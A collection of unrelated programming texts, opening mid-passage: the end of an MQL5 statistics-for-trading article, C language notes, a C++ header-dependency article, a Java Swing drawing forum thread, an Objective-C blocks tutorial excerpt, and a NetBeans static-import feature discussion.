sample, - D2 is the sample variance of the second sample. For the given height and weight data, correlation will be equal to 0.579098.
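The same check works for the paired samples (the arrX and arrY arrays from the article's script); a Python sketch reproduces the stated covariance of 91.2778 and correlation of 0.579098:

```python
heights = [173, 162, 194, 181, 186, 159, 173, 178, 168, 171]  # arrX
weights = [65, 70, 83, 60, 105, 58, 69, 90, 78, 65]           # arrY
n = len(heights)
m1 = sum(heights) / n
m2 = sum(weights) / n

# Sample covariance: paired deviation products, divided by n - 1.
cov = sum((a - m1) * (b - m2) for a, b in zip(heights, weights)) / (n - 1)
assert round(cov, 4) == 91.2778

# Sample correlation: covariance over the root of the variance product.
d1 = sum((a - m1) ** 2 for a in heights) / (n - 1)
d2 = sum((b - m2) ** 2 for b in weights) / (n - 1)
corr = cov / (d1 * d2) ** 0.5
assert abs(corr - 0.579098) < 1e-5
```

Note that both values are positive, consistent with taller people in this sample tending to weigh more.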
How to Use Statistics in Trading The simplest example illustrating the use of statistical parameters in trading is the MovingAverage indicator. Its calculation requires data over a certain period of time and gives the arithmetic mean value of the price: Where: - MA is the indicator value, - P[i] is the price, - n is the MA measurement period We can see that the indicator is a complete analog of the sample mean. Despite its simplicity, this indicator is used when calculating EMA, the exponential moving average which, in turn, is a basic element required for the MACD indicator - a classical tool for determining the trend strength and direction. Statistics in MQL5 We will look at the MQL5 implementation of the basic statistical parameters described above. The statistical methods reviewed above (and a lot more) are implemented in the statistical functions library statistics.mqh. Let us review their codes. 1. Sample mean The library function calculating the sample mean is called Average: Input data: data sample. Output data: mean. 2. Sample variance The library function calculating the sample variance is called Variance: Input data: data sample and its mean. Output data: variance. 3. Sample skewness The library function calculating the sample skewness is called Asymmetry: Input data: data sample, its mean and variance. Output data: skewness. 4. Sample kurtosis The library function calculating the sample kurtosis is called Excess (Excess2): Input data: data sample, its mean and variance. Output data: kurtosis. 5. Sample covariance The library function calculating the sample covariance is called Cov: Input data: two data samples and their respective means. Output data: covariance. 6. Sample correlation The library function calculating the sample correlation is called Corr: Input data: covariance of two samples, variance of the first sample and variance of the second sample. 
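To make the "MA is just a sample mean over a sliding window" point concrete, here is a small Python sketch (the price series is invented for illustration; the article's own code is MQL5):

```python
def moving_average(prices, n):
    """Simple MA: the arithmetic mean of the last n prices at each step."""
    return [sum(prices[i - n + 1:i + 1]) / n for i in range(n - 1, len(prices))]

prices = [1.10, 1.12, 1.11, 1.15, 1.14, 1.13]  # hypothetical quotes
ma3 = moving_average(prices, 3)

# One MA value per complete window of 3 prices.
assert len(ma3) == len(prices) - 2
# Each value is exactly the sample mean of its window.
assert abs(ma3[0] - (1.10 + 1.12 + 1.11) / 3) < 1e-12
```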
Output data: correlation. Let us now input height and weight sample data and process it using the library.

#include <Statistics.mqh>
//+------------------------------------------------------------------+
//| Script program start function                                    |
//+------------------------------------------------------------------+
void OnStart()
  {
   //--- specify two data samples
   double arrX[10]={173,162,194,181,186,159,173,178,168,171};
   double arrY[10]={65,70,83,60,105,58,69,90,78,65};
   //--- calculate the mean
   double mx=Average(arrX);
   double my=Average(arrY);
   //--- to calculate the variance, use the mean value
   double dx=Variance(arrX,mx);
   double dy=Variance(arrY,my);
   //--- skewness and kurtosis values
   double as=Asymmetry(arrX,mx,dx);
   double exc=Excess(arrX,mx,dx);
   //--- covariance and correlation values
   double cov=Cov(arrX,arrY,mx,my);
   double corr=Corr(cov,dx,dy);
   //--- print results in the log file
   PrintFormat("mx=%.6e",mx);
   PrintFormat("dx=%.6e",dx);
   PrintFormat("as=%.6e",as);
   PrintFormat("exc=%.6e",exc);
   PrintFormat("cov=%.6e",cov);
   PrintFormat("corr=%.6e",corr);
  }

After executing the script, the terminal will produce the results as follows: The library contains a lot more functions, the descriptions of which can be found in CodeBase. Conclusion Some conclusions have already been drawn at the end of the "Probability Theory and Statistics" section. In addition to the above, it would be worth mentioning that statistics, like any other branch of science, shall be studied starting with its ABCs. Even its basic elements can facilitate the understanding of a great deal of complex things, mechanisms and patterns which at the end of the day can be extremely necessary in trader's work. Translated from Russian by MetaQuotes Software Corp. Original article:
https://www.mql5.com/en/articles/387
Asserting

Prior to C99, assert needed an integral constant so had to write:: assert(NULL!=p); modern way: assert(p && "Valid pointer..."); as the string (which always evaluates to true) now appears in the error message. Remember to compile with NDEBUG defined to remove assertions.

Initialising

To avoid magic numbers, rather than do Paper(10,0) or commenting do: const size_t X_CM = 10; const size_t Y_CM = 20; Paper(X_CM, Y_CM); or if not a constant:: size_t x_cm = 0; // not const Paper(x_cm=10, ...) Paper(x_cm=20, ...) Remember sizeof is a compile time operator not a function so you can do:: Buffer *buf = malloc(sizeof *buf) and avoid specifying sizes twice; you still often see people write sizeof(Buffer). Initialising compound types:: struct WeatherNode { double todaysHigh; struct WeatherNode *nextWeather; }; don't do: struct WeatherNode node; memset(&node, 0, sizeof node) because all bits zero does not necessarily represent zero in floating point etc., instead: struct WeatherNode node = {0}; or, if you need to zeroise it at some later stage of the code then: const struct WeatherNode zeronode = {0}; ... memcpy(&node, &zeronode, sizeof node);

Right-Left-Rule

To read a complex cast expression - Start with the identifier, - look right, and then look left - repeat last step Interpret * as a pointer with the lowest precedence. e.g. if you've got a pointer to a block of memory ptr=(int*)malloc(51200), to call a function requiring a 2D array with dimensions 100 by 512 which is declared as: void fff(int array[][512]) you must cast the call as fff( (int (*)[512]) ptr); Right left rule says... No identifier, start with the innermost * (*) its a pointer (*) [512] a pointer to an array of 512, int (*) [512] a pointer to an array of 512 integers.

Linked lists

Define using: typedef struct node *NODEPTR; struct node { char *item; NODEPTR next; }; This declares a new typedef name involving struct node even though struct node has not been completely defined yet; this is legal.
Alternatively:: struct node { char *item; struct node *next; }; typedef struct node *NODEPTR; A standard structure initialisation idiom:: struct FontFamilyInfo { const char* name; int family; }; const FontFamilyInfo FamilyInfo[] = { {"DECORATIVE", FF_DECORATIVE}, {"MODERN", FF_MODERN}, {"ROMAN", FF_ROMAN}, {"SCRIPT", FF_SCRIPT}, {"SWISS", FF_SWISS} }; const int nFamilyInfo = (sizeof FamilyInfo) / (sizeof FamilyInfo[0]);

Variable args

e.g. pass list of strings #include <stdarg.h> char *ttt(char *first, ...) { size_t len; char *p; va_list argp; if(first == NULL) return NULL; len = strlen(first); va_start(argp, first); while((p = va_arg(argp, char *)) != NULL) len += strlen(p); va_end(argp); ... then call like char *str = ttt("Hello, ", "world!", (char *)NULL);

Macros

In #define statements '#' gets expanded into the argument surrounded by quotes so:: #define TEST(a,b) printf(#a "<" #b "=%d\n", (a)<(b) ) gives e.g. TEST(0, 0xFFF) -> printf("0" "<" "0xFFF" "=%d\n", (0)<(0xFFF)); ## is like a concatenation operator (must be in the middle of something) and is useful for forming variable names e.g.:: #define TEMP(i) temp ## i TEMP(1) = TEMP(2 + k) + x; -> temp1 = temp2 + k + x;

Variable Length Arrays

In C99, can do:: void f(int r, int c, int a[c][r]) which would have a prototype:: void f(int, int, int[*][*]); to indicate variable lengths. But note r & c must come before a!!

Pointer to Functions

#include <stdio.h> #include <math.h> main() { double (*ptr)(double) = sin; //pointer to a function float (*fptr)(float) = (float (*)(float))sin; //casting double a = (*ptr)(1.0); a = ptr(1.0); // alternative shorthand to above float b = (*fptr)(1.0); printf("a is %lf, b is %f\n", a, b); } Calling a function via its name - keep a table:: int func(), anotherfunc(); struct { char *name; int (*funcptr)(); } symtab[] = { "func", func, "anotherfunc", anotherfunc, }; Then, search the table for the name, and call via the associated function pointer.
Array References

*(a+k) is the same as a[k], or *(k+a) or k[a]:: int calendar[12][31]; int *p; p = calendar; // illegal since calendar converts // to a pointer to an array int (*monthp)[31]; monthp = calendar; // ok When allocating memory for strings, remember to allocate LENGTH+1 to allow for the terminating '\0'. There is no way to pass an array to a function directly: it is immediately converted to a pointer, so a definition:: int strlen(char s[]) eqv. strlen(char *s) main(int argc, char *argv[]) eqv. main(int argc, char **argv) --n >= 0 subtracts one from n and compares the result to zero, whereas n-- > 0 saves n, subtracts one from n, and then compares the saved value with 0, so the former is potentially faster.:: char *p = "some string"; while(*p++); p is now pointing to 1 _past_ the '\0'; (so probably want to back up with p--)

Strings

char *p = "..."; // maybe writable (string literal might be in read-only memory) char p[] = "..."; // always writable - string is used as an array initialiser const char p[] = "..."; // never writable No standard case insensitive string comparison, have to use strcasecmp (unix) or strcmpi (win32). char *p = NULL; // is a null character pointer, which is not the same as... char *p = ""; // which is a pointer to an empty string ie. a pointer to a '\0' when passing null as an argument use ttt((char *)0); Security problems with strings - strcpy(aaa, bbb) will keep going until it finds a terminating '\0'. (Note: use memmove instead of strcpy if the strings might overlap in memory) char aaa[10]={"1234567890"} // copies 10 characters without the trailing '\0'. // so use strncpy instead, but... strncpy(bbb, aaa, 5) // does not null-terminate bbb if using strncpy do:: char buf[6]; buf[5]=0; strncpy(buf,"welcome",5); You get [w][e][l][c][o][\0] or maybe:: char dest[N+1]; strncpy(dest, src, N)[N]=0 since dest is returned from strncpy.
Don't do:: char buf[100]; strncpy(buf,src,sizeof(buf)); buf[ sizeof(buf)-1 ] = 0; because that may get changed to:: char *buf = malloc(512); in which case sizeof(buf) will be the size of a pointer (typically 4 or 8), not 512!!! Also note: the sizeof operator does not work with arrays passed as function arguments: since only a pointer is passed. BSD's use strlcpy, strlcat etc. For sprintf:: char buf[BUFFER_SIZE]; sprintf(buf, "%*s", sizeof(buf)-1, "long-string"); /* WRONG */ sprintf(buf, "%.*s", sizeof(buf)-1, "long-string"); /* RIGHT */ but again if buf is malloc'ed sizeof won't work. Incidentally sizeof(char) is, by definition, exactly 1.

External Functions

In C, a global const has external linkage even without extern (in C++ it doesn't). In C, 'static' is used to make a global local to that file (in C++ use namespaces).

Arrays

The last specified array subscript changes fastest, opposite to FORTRAN. An array of 2 rows and 3 columns - aaa[2][3] - then element [i][j] can be located at offset i*3+j, so the first dimension is not used. To create a multidimensional array (from cfaq...) #include <stdlib.h> int **array1 = malloc(nrows * sizeof(int *)); for(i = 0; i < nrows; i++) array1[i] = malloc(ncolumns * sizeof(int)); The rule by which arrays decay into pointers is not applied recursively. An array of arrays (i.e. a two-dimensional array in C) decays into a pointer to an array, not a pointer to a pointer. If you are passing a two-dimensional array to a function: int array[NROWS][NCOLUMNS]; f(array); the function's declaration must match: void f(int a[][NCOLUMNS]) { ... } or void f(int (*ap)[NCOLUMNS]) /* ap is a pointer to an array */

getline

Only use fgets if you are certain the data read cannot contain a null; otherwise, use getline (but that is GNU only!). Also be careful of scanf especially on stdin since it leaves characters behind which mess up later input..
better to use fgets + sscanf char answer[100], *p; printf("Type something:\n"); fgets(answer, sizeof answer, stdin); if((p = strchr(answer, '\n')) != NULL) *p = '\0'; printf("You typed \"%s\"\n", answer);
https://rcjp.wordpress.com/notes/cc/
During the development of a project, we usually talk about the design of classes, discussing them in terms of design patterns, and describe the relationships among the classes. But most of the time we are not concerned about the files in which those classes are written. In any large-scale project it is worthwhile to also study the physical design, and in cases where the project is very large it is inevitable. It is very common in a large-scale project to have some general-purpose classes which are useful in other projects too. So the natural solution for using those classes in other projects is to put them in separate files. It is common practice among C++ users to make two files for one class: one file contains definitions, and the other has the implementation of the class and its member functions. For example, a Point class would be split something like this. But if you didn't program carefully, then sometimes it is not possible to just include these two files in another project and use the class. One of the most common problems that may arise is having to include some other definition files in your project which you don't actually need. And those files may in turn need other files, so in the end you may have to include a bunch of files just to use one single class. One example is that you might want to use a Database class, which is created in some library or DLL; then you might also need to include the definition files of some other classes in that library such as RecordSet.H, DBFactory.H and DBException.H etc. The situation is even worse if you have to include the definition files of different Database classes such as OracleInterface.H, SQLInterface.H and SybaseInterface.H etc. It is better to look carefully at which files are included in which files - especially which files are included in a definition file (header file). Because if you change anything in any definition file, then all the files that include it, whether definition files or implementation files, need to be recompiled.
From the compiler's perspective, a CPP file with all preprocessor directives expanded is called a translation unit. In other words, a translation unit is an implementation file with all the definition files included. Here is one such example of a translation unit. Now if you change anything in any of the definition files which are included in Camera.CPP, it means you have changed this translation unit and now it has to be recompiled. The situation becomes more serious if these definition files are included in more than one translation unit: now a change in one definition file requires recompiling all those translation units. Changes in definition files can be minimized if we use them only for definition, not for implementation. "In other words, the implementation of a function should not be in the header file even if it is only a one-line function. If performance is a concern, then that function can be declared inline explicitly. Now if there is any change in the implementation of the function only, then the compiler will recompile only that translation unit." In the other case, however, a change to the implementation of the function means recompiling all translation units which include this header file. If one header file is included in another header file, then changing the first header file will mean recompiling all the files which include either the first file or the second. The situation becomes even worse when a header file includes another header file, which includes another header file and so on. Now a change in one file may require recompiling not just one file, but possibly the whole project. This diagram shows the concept clearly. Even though your Camera class does not include Point.H or ViewPort.H directly, they are in fact included in the Camera translation unit. Now a change in the Point header file will recompile not only the Camera translation unit, but all translation units in this example.
The basic rule of thumb to minimize physical dependencies is: "Try to avoid inclusion of a header file within a header file unless you have no other option." But how can we make the compiler happy when we are not including the header file? To answer this question, we first need to understand in which cases we are forced to include a header file and in which cases we can avoid it. You have to include the header file when you need the full details of the class. In other words, you have to include the header file when you access a member function or variable of a class, inherit from a class, or aggregate its object in another class. We have already decided not to write implementation code in the header file, so the first case is automatically eliminated. If you use another object in member functions only - creating a local object of it, using it as a parameter, or holding a pointer to it in another class - then you do not need to include its header file. To make the compiler happy, you can just forward-declare that class in the header file. Now we can restate our basic rule to minimize physical dependencies: "Use forward declaration instead of including the header file wherever possible, such as when you are not inheriting from a class or aggregating it in another class." For example, in this case we have to include the Point header file in the ViewPort header file. #include "Point.h" class ViewPort { public: // Other functions private: // other attributes Point m_PtLeftTop; Point m_PtRightBottom; }; class ViewPort; class Transformation { public: void Scale(int p_x, int p_y, ViewPort& p_viewPort); // other functions }; You can further reduce the physical dependencies by holding a pointer to a class rather than an object of the class, because in the case of a pointer the compiler does not need the full details in the header file, and its inclusion can be totally eliminated. But in this case you have to create and destroy the object yourself, and there is the extra overhead of a function call.
In addition, this physical design might not fit your logical design very well: because you are not using inheritance, you can't access protected data of the class or override virtual functions. This technique is also known as the "Pointer to Implementation Principle", or "PImpl Principle" for short. There is one more apparent way to avoid including a header within a header: include all required header files in the cpp file before including its own header file. Take a look at the above example: ViewPort.H needs Point.H. Now include this header file in ViewPort.CPP before including ViewPort.H. // ViewPort.CPP #include "Point.h" #include "ViewPort.h" And the compiler will happily compile this unit. But there are two problems with this approach. First, you have to include the header files in the proper order, i.e. you have to remember the dependencies among header files, and the program will not compile if you include all the required header files in the wrong order. The second problem is even more serious: if you want to use ViewPort.H in any other translation unit, then that translation unit will not compile until you also include Point.H. From the physical point of view you haven't improved anything, and you have created more problems by introducing dependencies among header files which are hard to remember. Hence one more rule of thumb for managing physical dependencies: "Never make any file dependent on the order of header file inclusion."
http://www.codeproject.com/Articles/6527/Manage-Physical-Dependencies-of-a-Project-to-reduc?fid=36313&df=90&mpp=10&sort=Position&spc=None&noise=1&prof=True&view=None
Hi, Now i'm doing my Machine Learning job about k-NN and k-Means. I need to create graphics about my data coordinate. Basically, i don't have any idea to create this. Is there anyone can help?

This will get you started...

// Fig. 12.5: ShowColors.java
// Demonstrating Colors.
import java.awt.*;
import javax.swing.*;

public class ShowColors extends JFrame {

   // constructor sets window's title bar string and dimensions
   public ShowColors()
   {
      super( "Using colors" );
      setSize( 400, 130 );
      setVisible( true );
   }

   // draw rectangles and Strings in different colors
   public void paint( Graphics g )
   {
      // call superclass's paint method
      super.paint( g );

      // set new drawing color using integers
      g.setColor( new Color( 255, 0, 0 ) );
      g.fillRect( 25, 25, 100, 20 );
      g.drawString( "Current RGB: " + g.getColor(), 130, 40 );

      // set new drawing color using floats
      g.setColor( new Color( 0.0f, 1.0f, 0.0f ) );
      g.fillRect( 25, 50, 100, 20 );
      g.drawString( "Current RGB: " + g.getColor(), 130, 65 );

      // set new drawing color using static Color objects
      g.setColor( Color.BLUE );
      g.fillRect( 25, 75, 100, 20 );
      g.drawString( "Current RGB: " + g.getColor(), 130, 90 );

      // display individual RGB values
      Color color = Color.MAGENTA;
      g.setColor( color );
      g.fillRect( 25, 100, 100, 20 );
      g.drawString( "RGB values: " + color.getRed() + ", " +
         color.getGreen() + ", " + color.getBlue(), 130, 115 );
   } // end method paint

   // execute application
   public static void main( String args[] )
   {
      ShowColors application = new ShowColors();
      application.setDefaultCloseOperation( JFrame.EXIT_ON_CLOSE );
   }
} // end class ShowColors

/**************************************************************************
 * (C) Copyright 1992-2003 by Deitel & Associates, Inc. and               *
 * Prentice Hall. All Rights Reserved.                                    *
 **************************************************************************/
Besides... Isn't paintComponent() specific to components? A graphic isn't a component. As in the example above, I use paint() all the time and have had no issues.

@hfx642 wrote: "Besides... Isn't paintComponent() specific to components?" Well, right: for an AWT Component there is a paint() method, but your example is too old and shows a JFrame; for Swing the method to override is paintComponent() (for the content pane there is paint()). "A graphic isn't a component." Right, that is its method. "...and have had no issues." That is a textbook example, and the majority of such examples still work today, but that has nothing to do with real working code. ...
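To actually plot data coordinates the way the original question asks, a small sketch along these lines may help. All names here (ScatterPanel and its fields) are made up for illustration, and it overrides paintComponent() on a JPanel, as recommended in the discussion above:

```java
import java.awt.*;
import javax.swing.*;

// Illustrative sketch only: a panel that plots 2D data points,
// overriding paintComponent() on a JPanel (not paint() on a JFrame).
class ScatterPanel extends JPanel {
    private final double[][] points; // each entry is an {x, y} pair in pixel space

    ScatterPanel(double[][] points) {
        this.points = points;
    }

    @Override
    protected void paintComponent(Graphics g) {
        super.paintComponent(g); // let Swing paint the background first
        g.setColor(Color.BLUE);
        for (double[] p : points) {
            // draw a small filled dot centered on each data point
            g.fillOval((int) p[0] - 3, (int) p[1] - 3, 6, 6);
        }
    }
}
```

For a real k-NN/k-Means plot you would first scale your data coordinates into the panel's pixel space and perhaps color each dot by cluster; add the panel to a JFrame's content pane to display it.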
https://www.daniweb.com/programming/software-development/threads/363864/how-to-create-graphic
Using Blocks In Objective-C 2.0, blocks refer to a language construct that supports “closures,” a way of treating code behavior as objects. First introduced to iOS in the 4.0 SDK, Apple’s language extension makes it possible to create “anonymous” functionality, a small coding element that works like a method without having to be defined or named as a method. This allows you to pass that code as parameters, providing an alternative to traditional callbacks. Instead of creating a separate “doStuffAfterTaskHasCompleted” delayed execution method and using the method selector as a parameter, you can use blocks to pass that same behavior directly into your calls. This has two important benefits. First, blocks localize code to the place where that code is used. This increases maintainability and readability, moving code to the point of invocation. This also helps minimize or eliminate the creation of single-purpose methods. Second, blocks allow you to share lexical scope. Instead of explicitly passing local variable context in the form of callback parameters, blocks can implicitly read locally declared variables and parameters from the calling method or function. This context-sharing provides a simple and elegant way to specify the ways you need to clean up or otherwise finish a task without having to re-create that context elsewhere. Defining Blocks in Your Code Closures have been used for decades. They were introduced in Scheme (although they were discussed in computer science books, papers, and classes since the 1960s), and popularized in Lisp, Ruby, and Python. The Apple Objective-C version is defined using a caret symbol, followed by a parameter list, followed by a standard block of code, delimited with braces. Here is a simple use of a block. 
It is used to show the length of each string in an array of strings:

NSArray *words = [@"This is an array of various words"
    componentsSeparatedByString:@" "];
[words enumerateObjectsUsingBlock:^(id obj, NSUInteger idx, BOOL *stop) {
    NSString *word = (NSString *) obj;
    NSLog(@"The length of '%@' is %lu", word, (unsigned long) word.length);
}];

This code enumerates through the "words" array, applying the block code to each object in that array. The block uses standard Objective-C calls to log each word and its length. Enumerating objects is a common way to use blocks in your applications. This example does not highlight the use of the idx and stop parameters. The idx parameter is an unsigned integer, indicating the current index of the array. The stop pointer references a Boolean value. When the block sets this to YES, the enumeration stops, allowing you to short-circuit your progress through the array.

Block parameters are defined within parentheses after the initial caret. They are typed and named just as you would in a function. Using parameters allows you to map block variables to values from a calling context, again as you would with functions. Using blocks for simple enumeration works similarly to existing Objective-C 2.0 "for in" loops. What blocks give you further in the iOS SDK 4 APIs are two things. First is the ability to perform concurrent and/or reversed enumeration using the enumerateObjectsAtIndexes:options:usingBlock: method. This method extends array and set iteration into new and powerful areas. Second is dictionary support. Two methods (enumerateKeysAndObjectsUsingBlock: and enumerateKeysAndObjectsWithOptions:usingBlock:) provide dictionary-savvy block operations with direct access to the current dictionary key and object, making dictionary iteration cleaner to read and more efficient to process.

Assigning Block References

Because blocks are objects, you can use local variables to point to them. For example, you might declare a block as shown in this example.
This code creates a simple maximum function, which is immediately used and then discarded:

// Creating a maximum value block
float (^maximum)(float, float) = ^(float num1, float num2) {
    return (num1 > num2) ? num1 : num2;
};

// Applying the maximum value block
NSLog(@"Max number: %0.1f", maximum(17.0f, 23.0f));

Declaring the block reference for the maximum function requires that you define the kinds of parameters used in the block. These are specified within parentheses but without names (that is, a pair of floats). Actual names are only used within the block itself. The compiler automatically infers block return types, allowing you to skip specification. For example, the return type of the block in the example shown previously is float. To explicitly type blocks, add the type after the caret and before any parameter list, like this:

// typing a block
float (^maximum)(float, float) = ^float(float num1, float num2) {
    return (num1 > num2) ? num1 : num2;
};

Because the compiler generally takes care of return types, you need only worry about typing in those cases where the inferred type does not match the way you'll need to use the returned value.

Blocks provide a good way to perform expensive initialization tasks in the background. The following example loads an image from an Internet-based URL using an asynchronous queue. When the image has finished loading (normally a slow and blocking operation), a new block is added to the main thread's operation queue to update an image view with the downloaded picture. It's important to perform all GUI updates on the main thread, and this example makes sure to do that.
// Create an asynchronous background queue
NSOperationQueue *queue = [[[NSOperationQueue alloc] init] autorelease];
[queue addOperationWithBlock:^{
    // Load the weather data
    NSURL *weatherURL = [NSURL URLWithString:@""];
    NSData *imageData = [NSData dataWithContentsOfURL:weatherURL];

    // Update the image on the main thread using the main queue
    [[NSOperationQueue mainQueue] addOperationWithBlock:^{
        UIImage *weatherImage = [UIImage imageWithData:imageData];
        imageView.image = weatherImage;
    }];
}];

This code demonstrates how blocks can be nested as well as used at different stages of a task. Take note that any pending blocks submitted to a queue hold a reference to that queue, so the queue is not deallocated until all pending blocks have completed. That allows me to create an autoreleased queue in this example without worrying that the queue will disappear during the operation of the block.

Blocks and Local Variables

Blocks are offered read access to local parameters and variables declared in the calling method. To allow the block to change data, the variables must be assigned to storage that can survive the destruction of the calling context. A special kind of variable, the __block variable, does this by allowing itself to be copied to the application heap when needed. This ensures that the variable remains available and modifiable outside the lifetime of the calling method or function. It also means that the variable's address can possibly change over time, so __block variables must be used with care in that regard. The following example shows how to use locally scoped mutable variables in your blocks. It enumerates through a list of numbers, selecting the maximum and minimum values for those numbers.
// Using mutable local variables
NSArray *array = [@"5 7 3 9 11 13 1 2 15 8 6" componentsSeparatedByString:@" "];

// assign min and max to block storage using __block
__block uint min = UINT_MAX;
__block uint max = 0;

[array enumerateObjectsUsingBlock:^(id obj, NSUInteger idx, BOOL *stop) {
    // update the max and min values while enumerating
    min = MIN([obj intValue], min);
    max = MAX([obj intValue], max);

    // display the current max and min
    NSLog(@"max: %d min: %d\n", max, min);
}];

Blocks and Memory Management

When using blocks with standard Apple APIs, you will not need to retain or copy blocks. When creating your own blocks-based APIs, where your block will outlive the current scope, you may need to do so. In such a case, you will generally want to copy (rather than retain) the block to ensure that the block is allocated on the application heap. You may then autorelease the copy to ensure proper memory management is followed.

Other Uses for Blocks

In this section, you have seen how to define and apply blocks. In addition to the examples shown here, blocks play other roles in iOS development. Blocks can be used with notifications (see example in Chapter 1), animations, and as completion handlers. Many new iOS 4 APIs use blocks to simplify calls and coding. You can easily find many block-based APIs by searching the Xcode Document set for method selectors containing "block:" and "handler:".
http://www.informit.com/articles/article.aspx?p=1765122&seqNum=8
If I type this in: int val = abs(55); I get an error and an editor hint that offers to create a method called abs(). I would like to also get an editor hint that offers to do a static import of java.lang.Math.abs (and perhaps another hint for a static import of java.lang.Math.*).

This would be great... although in my case I would like to be given the hint to convert a "normal" use of a static method into a statically imported one. That should be a lot more trivial as there is no need to keep all valid method names in memory or anything.

I'm keen to have this as a hint. I have pretty much given up on static imports because they are such a pain in NetBeans. If nobody is currently working on this, I would greatly appreciate a pointer in the right direction so that I could perhaps look at implementing the functionality of turning an explicit use of a static method into a static import. E.g., if I have the code int val = Math.abs(55); I'd like the hinter to offer to turn Math.abs into a static import.

More power to you if you work on this, fommil! The general lack of support for static imports in NetBeans is really grating.

Has this been assigned to anyone? Is anybody considering this for a milestone? It would be really, really nice to have! NetBeans support for static imports is really quite poor due to the lack of this feature.

Is anybody looking at this? In Eclipse, one can set a list of "favourite static imports", which offers the functionality that the original poster is requesting. That, combined with a simple hint to convert a long-hand static method use to a static one, would be all the static import support I'd need.

After getting acquainted with the java.editor and java.hints module codebases, I believe this RFE is four-fold and should fall under the title "better support for static imports":

1) The Java Completer should offer static methods for completion as if they were local.
I believe this already happens for already imported static methods, but it should also do this for static methods from user-specified classes, potentially with NetBeans shipping a good stock supply as default. This requires a UI similar to the new "Java Code Completer Excluder" that I added as part of bug 125060 (latest UI not yet committed).

2) The Java Hints system should consider the possibility that methods which are undeclared in the local context may be available as static imports from elsewhere (maybe just from the user-defined path), and therefore a hint should be offered to take the appropriate action. This resolves the original poster's example.

3) The Java Editor Auto Import function dovetails with point 2.

4) A Java Hint for converting OldStyle.staticMethodInvocation() -> staticMethodInvocation() with static import, potentially a function that performs this for an entire file.

I'm considering taking this RFE on as my second significant patch to the NetBeans codebase. jlahoda, are you ok remaining as the assignee with me attaching patches (against main-golden) here for feedback? This will span java.editor and java.hints. Initial advice is welcome!

Great, fommil! Some more comments:

- The hint (point 4) for converting usages of static methods should only be visible when the cursor is on the respective expression, much like for Assign Return Value To New Variable. Maybe that goes without saying. The point is that static imports are not always desirable, e.g. for EnumSet.of(…), therefore source files shouldn't be displayed sprinkled with corresponding warnings/hints.
- As a fifth point, there is Fix Import, which should offer static import suggestions for unresolved local method calls. (Maybe that's what you meant with point 3?)
- There's also the issue of where static imports are auto-inserted in the list of import directives. Currently auto-insertion of ordinary imports ignores static imports when searching for where to insert the import directive.
It would probably be useful to provide different options here (or really good heuristics). Some people prefer static imports to be mixed with ordinary imports, although the comb-like structure due to the "static" keyword makes the imports list less readable. Other people prefer the static imports before the ordinary imports, others prefer after. This is also often project specific. See for example Eclipse's Organize Imports configuration dialog, which I believe provides support for all of this.

@matthies thanks for your comments.

Re: visibility, "mouseover" will be the default but users will be able to change this in the hints config menu. A blacklist could potentially be used to avoid hints altogether.

Re: fix imports, I never knew NB did this :-)

Re: sort support. Hmm, have you seen my bug 125566 report? I believe "sorting members" is part of Eclipse's functionality here... and something I miss since moving over (except sorting of enum ordinals!).

@fommil: For re-ordering imports, extending the functionality of Fix Imports, there's already issue 122109. Although there is some overlap, I believe this should remain a separate issue from better support for static imports. But choosing an ordering is already necessary for the latter. As for your issue 125566, I prefer specific code fixes/refactorings to be kept separate from whole-file source formatting/prettification. Of course auto-generation of code (such as import directives) should result in nice source code (hence inserting import directives according to some ordering), but it shouldn't modify other parts of the source. (For non-final variables I'd probably like warnings and a dedicated refactoring command.) See also issue 156460.

Thanks for the pointer to issue 122109, I'm now CCd. Not so keen on 156460, although I agree that non-final fields (that can be made final) could do with a warning.

First of all, let me say that this may be a major undertaking.
Looking at your proposal, I do not like that the user would be required to set classes for which the static import related features would work. From the user's point of view, this does not seem right. An issue here is that although the current index contains symbols (methods and fields) for user classes, it does not contain them for classes indexed from jar files, due to performance concerns. It might be possible to index only static members for classes from jars, but that needs to be investigated (from a performance and API point of view).

To the individual mentioned parts:

1. (code completion) I think that the unimported methods should be shown only for "all" code completion, similarly to unimported types.

2.+3. (imports) Actually, imports handling is mostly done in ComputeImports (java.editor); the hint and fix-all-imports features are only views over the data provided by ComputeImports. Although the features may need some tweaks to present the static imports in a user-friendly way, the hard work will likely be in ComputeImports.

4. (convert to static import hint) I agree with matthies - this should be a caret-sensitive hint, at most. Possibly it should be disabled by default, so that it would not annoy users that do not want to use static imports. Also note that there are experiments on batch application of hints (see the "batch" package in contrib/javahints).

Another area that may need changes (and is related to #125566) is import analysis. When a NB plugin generates Java code, it is supposed to use the Java infrastructure, especially TreeMaker and WorkingCopy.rewrite(). When TreeMaker.QualIdent(Element) is used (or TreeMaker.Type(TypeMirror)), the infrastructure handles the imports for the client.
This is performed in ImportAnalysis2 (java.source) and it will likely be necessary to adjust this class for static imports, otherwise code generated through the API will not use static imports (this expects that the client creates QualIdent for the method/field itself, not for its enclosing type, but if it does not, it is a bug in the client). Also, GeneratorUtilities.import{FQNs|Comments} may need to be fixed.

@jlahoda, thanks for your comments. I'll take them on board... will certainly need help with this RFE and might put it off for a bit, or at least break it into manageable chunks.

Re: user-specified classes, this is what Eclipse does and it works surprisingly well. Every coder has a few static utility methods that they tend to use a *lot*. The idea is that the user would add those. In my case, I'd probably add a few methods from Preconditions (part of google-collections). I don't think that functionality is the core of this RFE... the core functionality comes from the ability to convert a Class.staticMethod -> staticMethod with static import.

Hints "off" by default is a serious option, but when implemented I'd like to have a poll to see if the majority of users would prefer a mouseover hint by default.

I am tempted to install the latest version of Eclipse to see what they are doing with regards to static importing. I recall their support was far superior to NetBeans.

I'm starting with a hint to offer a static import. Expect a patch over the next week or so at the latest.

I've hit a problem and could do with some help. Working out whether or not a METHOD_INVOCATION is actually invoked in a qualified way, e.g. Math.abs() vs abs() + static import, is actually quite tricky. The only way I seem to be able to do this is to use getSourcePositions and see if there is a "." in the text! That's a horrible solution IMHO; are there any ways to do this using the Compiler Tree API? Other than that...
I've got code working that does the detection and currently returns a do-nothing fix.

I agree that user-specified "favorites" for static imports are useful and work well. My co-workers that use Eclipse love them. There needs to be project-specific settings though, or at least the suggested imports must be restricted to the ones available from the libraries and sources of the current project. There's an increasing number of APIs that are designed assuming static imports, in particular ones providing internal DSLs (like this:), and that are cumbersome to use when static imports have to be added by hand every time. In our team, NetBeans has already become an impediment here, and for some developers it's becoming a serious incentive to switch to Eclipse. So, fommil, your work is really appreciated!

